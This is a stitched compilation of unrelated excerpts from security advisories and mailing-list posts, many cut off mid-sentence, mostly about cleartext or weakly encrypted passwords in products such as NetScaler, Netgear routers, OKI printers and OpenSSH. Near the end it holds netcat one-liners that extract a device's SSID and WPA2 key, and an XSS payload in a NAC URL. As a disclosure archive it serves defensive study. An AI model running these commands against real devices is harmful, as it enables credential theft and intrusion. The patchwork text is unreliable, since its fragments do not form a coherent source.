certificate, so that there can be no "man in the middle" (servers
usually don't verify client certificates).
The problem discussed in this writeup is caused by a software flaw.
The flaw allows an attacker to inject client commands into an SMTP
session during the unprotected plaintext SMTP protocol phase (more
on that below), such that the server will execute those commands
during the SMTP-over-TLS protocol phase when all communication is
supposed to be protected.
The injected commands could be used to steal the victim's email or
Background:
For most web application logins a user fills out an HTTP form, which sets up the user with a session cookie. The cookie content is merely a session ID, which allows the server-side application to match incoming requests to a specific user and session. If the cookie gets compromised, for example through XSS, the attacker might be able to impersonate the user for the duration of the session, but this typically does not allow the attacker to obtain the user's login credentials.
Vulnerability:
The web management interface of Citrix NetScaler stores the user's credentials in an encrypted form in the cookie, namely values ns1 and ns2. In addition the cookie contains other encrypted information in values ns3, ns4, and ns5. Since the encryption is a simple XOR with a fixed key stream it is possible to determine parts of the key stream by XOR'ing a known plaintext with its corresponding ciphertext. This in turn allows the attacker to recover the plaintext form of the user's credentials by applying the key stream to cookie values ns1 and ns2. Furthermore, the cipher does not in any way pad the plaintext before it gets encrypted so the length of the ciphertext is equal to the length of the plaintext, which also provides a clue about the plaintext.
There are several approaches to obtain the ciphertext for some known plaintext:
* Log into the management console with the attacker's own credentials (if the attacker is a configured user, even one with minimal privileges) and analyze the resulting cookie.
* Make an educated guess about the username contained in ns1. (As an example, the default root user on NetScaler is "nsroot".)
========================================================================
Vulnerability Affecting FireGPG Passphrase and Cleartext Recovery
10/20/2008
Abstract
FireGPG is a Firefox extension that provides a front-end to GPG,
allowing webmail users to conveniently exchange GPG messages from
Firefox.
/------------------------------------------------------\
| Group-Office Cleartext Credentials Stored in Cookies |
\------------------------------------------------------/
Summary
=======
Group-Office 4.0.71 was found to display a behaviour that could potentially
expose a user's username and cleartext password to third-parties. Under
2.2) Unauthenticated file disclosure & file write/modification
An unauthenticated attacker is able to read arbitrary files of the operating
system with the access rights of the operating system user "nagios" (the only
"security protection" is the weak Referer-check from 2.1). He is able to gain
sensitive information such as cleartext passwords of monitored systems.
Furthermore, it is possible to alter those files if they are owned and writable
by the "nagios" user, which nearly all "GroundWork" files under
"/usr/local/groundwork" are.
4. Inadequate Encryption Strength
###############################################################################
Reason: Weak encryption algorithm used in OpenCart
Preconditions: none
Result: an attacker can use a known-plaintext attack to obtain the encryption key
http://opencarthelp.com/a/?q=improve-opencart-security#change_encryption_key
"Change your encryption key (PCI)
Changing the encryption key will help increase security for your store
Details:
This release includes fixes for the following vulnerabilities:
1. BEAST (Browser Exploit Against SSL/TLS) attack (CVE-2011-3389)
There is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plaintext encrypted with the same IV and key generates the same ciphertext, which is why having an unpredictable IV is important.
The BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
2. Buffer overflow vulnerability (CVE-2012-2110/CVE-2012-2131)
SSL-C contains code that does not properly interpret integer data, which could allow buffer overflow attacks using crafted DER (Distinguished Encoding Rules) data, such as in an X.509 certificate or an RSA asymmetric key.
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- -----------------------------------------------------------------------
iViZ Techno Solutions Pvt. Ltd.
http://www.ivizsecurity.com
- -----------------------------------------------------------------------
* Title: Hewlett-Packard BIOS Plain Text Password Disclosure
* Date: 25/08/2008
* Software: Hewlett-Packard BIOS
* Vendor Bug Tracker : SSRT080104
> Based on the description contained in the CPNI report and a slightly
> more detailed description forwarded by CERT this issue appears to be
> substantially similar to a known weakness in the SSH binary packet
> protocol first described in 2002 by Bellare, Kohno and Namprempre[2].
> The new component seems to be an attack that can recover 14 bits of
> plaintext with a success probability of 2^-14
Could someone please help the uncomprehending [i.e. me :-)] understand
why or whether this is anything to be worried about at all ?
Quick calculator session:
- Session fixation
- Session impersonation
- Remote buffer overflow
- Privilege escalation in two applications
- Missing authentication in configuration panel
- Admin password is delivered in plaintext inside the server response
- Cookies are set for root path, not application path
- Crawler endless loop
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
OpenSSH Security Advisory: cbc.adv
Regarding the "Plaintext Recovery Attack Against SSH" reported as
CPNI-957037[1]:
The OpenSSH team has been made aware of an attack against the SSH
protocol version 2 by researchers at the University of London.
Unfortunately, due to the report lacking any detailed technical
description of the attack and CPNI's unwillingness to share necessary
information, we are unable to properly assess its impact.
----------------------------
evalsmsi 2.1.03 contains multiple vulnerabilities.
1 - Insecure storage of password
The passwords are stored in plaintext in the database.
table : authentification
column: password
2 - Authentication Bypass
> connection.
>
>> > The usage pattern where the attack is most likely to succeed is where an
>> > automated connection is configured to retry indefinitely in the event of
>> > errors. In this case, it might be possible to recover as much as 14 bits
>> > of plaintext per hour
[...]
>> Given the amount of data pumped down the typical automated connection
>> per hour, this is hardly anything to worry about .. surely ?
>
> That depends on the data that is being transferred. If it includes
The (h)h3cUserPassword is presented in one of three formats as defined
in the (h)h3cAuthMode object and mirrors how passwords are stored in the
device configuration:
0 -- password simple, meaning cleartext
7 -- password cipher, meaning ciphertext
9 -- password sha-256, meaning one-way sha-256 hash
SHA-256 is a recent addition and is not supported on all devices yet.
Furthermore, with every "authentication" attempt to the server the attacker
gains knowledge of the administrative password.
The password for the "SuperUser" is sent from the TSA server to the client in
cleartext in the following way:
Name=SuperUser Password=072 175 173 176 173 177 181
Well, it is exactly as it appears above. It is the "SuperUser"'s account
name and
23/tcp open telnet
80/tcp open http
Port 80 gives access through an HTML interface to the configuration menu, as would be expected, but although you can control access to that interface using a password, there is no control over the telnet port. So, by telnetting to port 23 (on its default IP 192.168.0.1) users automatically get access to the filesystem without providing any credentials at all. The file system of the device may then be used for malicious communication and temporary data storage. Also, a user may download the upgrade firmware's HTML code from the www directory, modify it locally to allow files other than IMGs to be uploaded, and replace the existing firmware, making the device useless.
Also, one can view the contents of the /etc/htpasswd file, where everything is in plaintext, and retrieve the web-based administrator's (admin) password. Some of the possible implications, which can be triggered from the web interface but are not limited to the following, are:
1. Intruders are now able to open the configuration page and go through the submenus, where they can get the wireless key in use (the wireless key is displayed in plaintext as well).
2. They can perform a trivial DoS attack (a factory restart of the modem stops everything from working); the same is possible from the telnet session, since by issuing the command "reboot" the device will obey and restart itself.
3. They can change configurations and policies for clients, causing confusion.
4. Or they could download a backup copy of the configuration file for the device (the same file can be obtained by viewing the contents of "/tmp/nvram"); from that file one can easily extract the ADSL account logins or any other information one is curious about, as everything is stored in plaintext (once again).
CVE-2011-0435
Insufficient checks in bw_per_month.php can lead to bandwidth
usage information disclosure.
CVE-2011-0436
After a registration, passwords are sent in cleartext
email messages.
CVE-2011-0437
Authenticated users could delete accounts using an obsolete
interface which was incorrectly included in the package.
Introduction:
-------------
The OKI C5510MFP printer offers a web interface for the configuration.
Certain pages require higher privileges for making changes. However, the
password required for accessing these pages is sent to the client in
clear text by the printer. Furthermore, the password can be set without
prior authentication. Consequently, the whole configuration can be
changed without knowing the password.
Vulnerable:
I quickly discovered two interesting things:
First, I found a hard-coded credential used for direct serial programming. Using it requires direct physical access and you have to solder wires onto the board. Despite this not being particularly interesting, this issue has been assigned as CVE-2012-6340 anyway. It's always good to have the information out there.
Second, I noticed that there were multiple copies of my config file, and all passwords (for both control panel and wifi) within them are plain-text. It turns out that, in order to prevent config file corruption, the router re-generates the entire config file and writes a new copy directly after the previous one. It then activates the new config, and soft-deletes the old file by removing its entry from a list. Once you've changed the config several times (about 11 on this device), it hits the end of the flash chip's storage and cycles back to the original address. However, it does not actually wipe the old config files.
This issue, assigned CVE-2012-6341, results in the ability to recover all previously used passwords on the device, for both the control panel and WEP/WPA/WPA2, in plaintext. A factory reset does not fix this; it simply restores a default config file onto the lower address. As such, an attacker who steals the device may recover the last-used passwords and config, as well as many previous passwords and configuration data. There also seems to be some storage of DHCP client information, but the data I have is inconclusive due to it being partially overwritten.
This has been confirmed on the WGR614v7 and WGR614v9 models, and is expected to be the case on all other revisions. It also looks like the WGR624 model has the same design, so other models in the same series may be affected too.
1. The IE user's browsing history is compounded of different files
and folders. One of these files is named 'index.dat', and is usually
located at: 'C:\Documents and settings\USERNAME\Local
settings\History\History.IE5\index.dat'. Although the format of this
file is not entirely text, IE will store every visited URL including any
parameters in the query string in plain text.
2. Although the aforementioned folder cannot be directly browsed
using Windows Explorer or Internet Explorer, it can be browsed and
viewed by referring to the same folder using the UNC notation:
'\\[COMPUTERNAME|127.0.0.1]\C$\Documents and settings\USERNAME\Local
settings\History\History.IE5'.
Formshield
1. The value of the properties parameter changed each time
new text was populated in the CAPTCHA image. Changing content of this
parameter results in no new text being generated at all. The encrypted
properties value though is obtained by a dynamic key in the
__VIEWSTATE variable. If the contents of the __VIEWSTATE variable can
be obtained then we have a plaintext cipher text match which can be
replayed every time for every new request.
Details of the Attack
To carry out this attack we need to intercept and modify HTTP(S)
application or server-scoped variables. Since these
variables should be inaccessible by the user, it is not
uncommon to store sensitive data in them.
Exploiting this vulnerability requires modification of the
serialized view object, which is not stored in a plaintext
format. The Deface tool[12] can be used to provide
proof-of-concept attacks.
Remediation Steps:
SEC Consult Security Advisory < 20090429-0 >
=======================================================================
title: Proxy bypass vulnerability & plain text passwords
in LevelOne AMG-2000
product: LevelOne AMG-2000 Wireless AP Management Gateway
vulnerable version: Firmware <=2.00.00build00600
impact: critical
homepage: http://www.level1.com
found: 2008-12-16
by: J. Greil / SEC Consult / www.sec-consult.com
Microsoft Office Outlook is a personal information manager. It is often
mainly used as an e-mail application, but it also includes a calendar,
task manager, contact manager, note taking, a journal and web browsing.
Outlook supports various e-mail formats, including plain text, HTML and
TNEF. TNEF is a proprietary format used by Microsoft Outlook and
Microsoft Exchange Server. TNEF messages or TNEF streams consist of
message and/or attachment attributes. These attributes contain basic
properties, such as message subject, date sent and attachment title
(file name). Additional attributes can be set using MAPI properties,
* Chris Thomas reported that background tabs could create a
borderless XUL pop-up in front of pages in other tabs
(CVE-2008-1241).
* oo.rio.oo discovered that a plain text file with a
"Content-Disposition: attachment" prevents Firefox from rendering
future plain text files within the browser (CVE-2008-0592).
* Martin Straka reported that the ".href" property of stylesheet DOM
nodes is modified to the final URI of a 302 redirect, bypassing the
http://(NACIP)/assets/rangesearch?fromIndex=0&query=asdf" onclick="alert(123)"&main_selection=all
Forescout NAC ICMP and ARP Protocols Not Filtered Vulnerability Advisory (CVE-2012-4985)
Forescout NAC (Network Access Control) device is vulnerable to ICMP and ARP protocol filter bypass. The NAC does not filter traffic from unknown clients over these protocols. An attacker with an unauthorised device can engage ARP poisoning attacks and potentially gain access to cleartext login credentials traversing the network (where cleartext protocols are employed). The attacker could then use these credentials via an authorised terminal/workstation to gain full access to the network.
http://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html
http://www.reactionpenetrationtesting.co.uk/forescout-nac-xss.html
http://www.reactionpenetrationtesting.co.uk/forescout-nac-icmp-arp.html
NetSaro Enterprise Messenger Server Plaintext Password Storage Vulnerability
CVSS Risk Rating: 4.6 (Medium)
Product: NetSaro Enterprise Messenger Server
Application Vendor: SEM Software
Vendor URL: http://www.netsaro.com/
python -c 'print "\x05" + "\x00" * 7' | nc -u <IP_ADDR> 2003
- Retrieving Wi-Fi SSID
python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u <IP_ADDR> 2003
cat ssid.txt (cleartext SSID displayed after "21 27 xx xx" in the
received datagram)
- Retrieving WPA2 PSK
python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt <IP_ADDR> 2003
Intro
----
Roundcube Webmail is a browser-based IMAP client that uses the
"chuggnutt.com HTML to Plain Text Conversion" library to convert
HTML text to plain text; this library uses the preg_replace PHP
function in an insecure manner.
Vulnerable versions:
Round Cube RoundCube Webmail 0.2-3 beta